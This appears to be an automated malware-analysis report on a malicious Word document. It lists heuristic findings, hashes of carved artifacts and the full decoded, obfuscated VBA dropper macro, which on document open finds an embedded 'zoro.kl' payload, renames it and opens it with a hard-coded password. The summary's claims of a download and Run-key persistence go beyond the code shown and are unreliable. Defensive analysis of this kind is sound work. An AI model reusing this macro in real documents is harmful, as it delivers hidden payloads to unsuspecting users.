Verdict: MALICIOUS
Risk Score: 232

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro that executes upon opening the document, indicated by the 'Document_Open' subroutine. This macro appears to be designed to download and execute a second-stage payload, as suggested by the logic involving file paths and the opening of a password-protected document. The password 'doyouknowthatthegodsofdeathonlyeatapples?' is used to decrypt the embedded payload, and the macro attempts to establish persistence by writing to the Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'.
Heuristics (9)

- Office EPRINT stream contains EMF object (high, OLE_EPRINT_EMF_OBJECT): OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
- Embedded Office document has suspicious static findings (critical, EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE): A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The OLE file is 561,557 bytes but its declared streams total only 246,437 bytes; the remaining 315,120 bytes (56%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- OLE file has appended executable-looking payload bytes (high, OLE_APPENDED_PAYLOAD): This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The OLE compound file contains a large high-entropy region beyond the declared major streams, and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Private Sub Document_Open()`
- Office document is password-encrypted (medium, OFFICE_ENCRYPTED_PACKAGE): This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The OLE container holds an MS-OFFCRYPTO encrypted package (Agile Encryption, Office 2010+).
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/2006/encryption (in document text, OLE body)
  - http://schemas.microsoft.com/office/2006/keyEncryptor/password (in document text, OLE body)
  - http://schemas.microsoft.com/office/2006/keyEncryptor/certificate (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (6)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3562 bytes | 2064db1d71e39f55f94251536de7d2372c96320ce9c79c01697ef6e8c7be7018 | | |
| ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1694992545/Ole10Native | 252707 bytes | d6ea8d88262bd94b2bca58d8f73c5c5faac519adcac774c5dfe0bd0411e389bc | No threats found | likely (carved artifact entropy 7.98, consistent with packed or encrypted content) |
| ole10native_00_zoro.kl | ole-package-payload | OLE Ole10Native payload: ObjectPool/_1694992545/Ole10Native; display_name=zoro.kl; full_path=C:\Users\kell\AppData\Local\Temp\zoro.kl; temp_path=; def_file= | 252416 bytes | 88a8612327c5152fb4d0989c8ef69164f68d1147882e71a59fbc5ae93de37de4 | No threats found | likely (carved artifact entropy 7.98, consistent with packed or encrypted content) |
| ole10native_01.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1694996405/Ole10Native | 252707 bytes | 1c306409f708b79114b62ad62fb8659b9188de15a0c64e70b55fcc7919b3eb1e | No threats found | likely (carved artifact entropy 7.98, consistent with packed or encrypted content) |
| ole10native_01_zoro.kl | ole-package-payload | OLE Ole10Native payload: ObjectPool/_1694996405/Ole10Native; display_name=zoro.kl; full_path=C:\Users\kell\AppData\Local\Temp\zoro.kl; temp_path=; def_file= | 252416 bytes | d75bc014475e80f11014da249e18698765aa5a19227315f34d85d7f6daf41249 | No threats found | likely (carved artifact entropy 7.98, consistent with packed or encrypted content) |
| embedded_office_off0008e86b.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x8E86B | 561557 bytes | 8e93b928be16468b2adbf688d722d07ac962202688ddaedca29eb961ef272f2a | No threats found | likely (carved artifact entropy 7.93, consistent with packed or encrypted content) |

Preview script: first 1,000 lines of the extracted macros.bas

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
Dim lds As String
Dim vssfs As String
Private Sub Document_Open()
Dim dfgdgdg
Call s1("L")
Dim fds, fdsa As String
fds = "\"
fdsa = ".d"
Call s2("ocal/")
Call ass
Call acc
Dim kytrewwf As String
kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)
fds = kytrewwf & fds
If Dir(fds & "zoro" & fdsa & vssfs) = "" Then
Dim mySum
mySum = Application.Run("ppl")
If Len(lds) > 2 Then
Call nam(lds, kytrewwf)
Call pppx(fds & "zoro" & fdsa & vssfs)
End If
End If
End Sub
Sub plof(kl As String)
lds = kl
End Sub
Sub ass()
vssfs = "o"
End Sub
Sub acc()
vssfs = vssfs & "c"
End Sub
Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject
Call Search(MyFSO.GetFolder(asda), lds)
End Sub
Attribute VB_Name = "Module1"
Dim vcxz
Sub pppx(pili As String)
Call oicx(pili)
Documents.Open FileName:=vcxz, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:="doyouknowthatthegodsofdeathonlyeatapples?", _
PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub
Sub oicx(iii As String)
vcxz = iii
End Sub
Attribute VB_Name = "Module3"
Sub bvxfcsd(tini As String)
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.TypeBackspace
Selection.Copy
Dim uuuuc
uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)
ntgs = 50
sda = 49
While sda < 50
ntgs = ntgs - 1
If Dir(Left(uuuuc, ntgs) & tini, vbDirectory) = "" Then
Else
sda = 61
End If
Wend
Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & tini)
End Sub
Attribute VB_Name = "Module123345"
Dim pls As String
Sub Search(mds As Object, pafs As String)
Dim Nedc As Object
Dim Ters As Object
For Each Nedc In mds.SubFolders
Search Nedc, pafs
Next Nedc
For Each Ters In mds.Files
If Ters.Name = "zoro.kl" Then
pafs = Ters
End If
Next Ters
Exit Sub
ErrHandle:
Err.Clear
End Sub
Sub nam(pafs As String, aaaa As String)
Call ousx(aaaa)
Dim oxl
oxl = "\zoro.d"
oxl = oxl & "o"
oxl = oxl & "c"
Name pafs As pls & oxl
End Sub
Sub uoia(fffs As String)
pls = fffs
End Sub
Sub ousx(aaaa As String)
Call uoia(aaaa)
End Sub
Attribute VB_Name = "Module2"
Dim mgf, uhjknb, wers, qweds, fafaa As String
Dim ocm As String
Sub s1(vi As String)
mgf = vi
End Sub
Sub s2(vi As String)
uhjknb = vi
End Sub
Sub s3(vi As String)
wers = vi
End Sub
Sub ppl()
Dim mfd As String
mfd = "e"
wers = "T"
Dim poidds As String
Dim ugfc As String
ugfc = "p"
qweds = "m"
poidds = mgf & uhjknb & "" & wers & mfd & qweds & ugfc
Call bvxfcsd(poidds)
End Sub
```